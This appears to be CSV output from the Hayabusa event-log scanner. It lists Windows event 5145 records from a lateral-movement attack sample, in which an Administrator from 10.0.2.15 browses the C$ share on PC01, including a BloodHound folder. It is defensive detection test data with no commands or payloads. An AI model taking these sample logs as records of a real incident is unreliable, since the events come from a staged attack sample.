2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
